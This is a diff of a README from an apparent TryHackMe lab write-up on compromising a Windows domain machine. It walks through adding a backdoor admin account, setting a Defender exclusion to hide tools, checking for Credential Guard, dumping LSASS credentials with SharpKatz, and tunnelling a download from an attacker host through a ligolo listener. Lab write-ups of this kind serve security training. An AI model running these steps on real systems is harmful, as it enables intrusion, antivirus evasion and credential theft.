zinzloun/THM_WriteUP/README.md

     net localgroup administrators support /add
     net localgroup "Remote Desktop Users" support /add

-Then we can proceed to connect to the server with RDP, using Remmina.
-Then I set a Defender exclusion folder for:
+Then we can proceed to connect to the server using Remmina.
+Once logged I set a Defender exclusion folder for:

     C:\users\support\music

-### Flag submission
-You can find the flag in the administrator desktop folder.

-Now that we compromised a domain machine we can try to get in control of the DC.
-To do that we need to get at first the credentials of the domain users.
-The first choice would be to try to dump LSASS to try to get some hashed password (or if we are lucky enough even clear password, in case of NTLM).
-But as we known probably credentials guard is in place, since we are on Server 2019.
-We can verify using the following command in powershell (run as administrator):
+Now that we compromised a domain machine, we can try to get in control of the DC.
+To do that generally involves to get at first the credentials of the domain user.
+The first choice would be to try to dump LSASS to try to get some hashed password (or if we are lucky enough even clear password.
+But as we known, probably credentials guard is in place.
+We can verify I using the following command in powershell (run as administrator):

     Get-CimInstance –ClassName Win32_DeviceGuard –Namespace root\Microsoft\Windows\DeviceGuard
     ...
     SecurityServicesConfigured                   : {0}
     SecurityServicesRunning                      : {0}
     ...
-Since both 0 are returned for the settings showed above, it means that credentials guard is not enabled.
+Since both 0 are returned for the settings showed above, INDEED it means that credentials guard is not enabled.
 Further more we can verify if we have privilege (we should since we are local admin) to dump LSASS:

     whoami /priv | findstr SeDebug
     SeDebugPrivilege                          Debug programs                                                     Enabled

-At this point I decided to use the port of Mimikatz in C# [SharpKatz](https://github.com/b4rtik/SharpKatz), since it can be compiled by your own and eventually you can modify the source code to evade AV.
-Eventually I'm more confident with C#.
-For this Lab it was enough run the compiled file from the excluded folder.
-Defender did not complain.
-To download the file from our attacker machine we need to set up another listener in ligolo to access our python webserver throught the agent.
+At this point I decided to use the port of Mimikatz in C# [SharpKatz](https://github.com/b4rtik/SharpKatz), since it can be compiled by yourown and eventually you can modify the source code to try to evade AV.
+Eventually I'm more confident to make changes in C# code.
+For this Lab it was enough to run the compiled file from the excluded Defender folder.
+To download the file from our attacker machine we need to set up another listener in ligolo, to access our python webserver throught the agent.
 Follows the command to execute in liglolo console:

     [Agent : root@ip-10-200-95-33] » listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000 --tcp